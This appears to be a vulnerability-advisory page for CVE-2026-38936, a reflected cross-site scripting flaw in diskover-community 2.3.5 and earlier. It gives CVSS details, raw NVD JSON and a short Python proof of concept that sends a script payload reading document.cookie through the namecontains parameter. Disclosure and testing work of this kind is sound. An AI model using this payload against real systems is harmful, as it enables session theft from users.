Security Vulnerability Report
中文
CVE-2026-38936 CVSS 6.1 MEDIUM

CVE-2026-38936

Published: 2026-04-27 17:16:43
Last Modified: 2026-04-27 18:35:54

Description

A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

diskover-community <= 2.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-38936 # Target: diskover-community <= 2.3.5 # Endpoint: /public/selectindices.php # Parameter: namecontains # Payload to test: # <script>alert('XSS')</script> # Example URL: # http://[TARGET_IP]/public/selectindices.php?namecontains=<script>alert(document.cookie)</script> # Python request example: import requests target_url = "http://localhost/public/selectindices.php" payload = "<script>alert(document.cookie)</script>" params = {"namecontains": payload} response = requests.get(target_url, params=params) if payload in response.text: print("Vulnerable to Reflected XSS") else: print("Not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38936", "sourceIdentifier": "[email protected]", "published": "2026-04-27T17:16:43.250", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability exists in diskover-community <= 2.3.5 in public/selectindices.php via the namecontains parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "http://diskover-community.com", "source": "[email protected]"}, {"url": "http://diskoverdata.com", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38936", "source": "[email protected]"}, {"url": "https://github.com/VadlaReddySai/diskoverdata-cve-writeups/blob/main/CVE-2026-38936", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}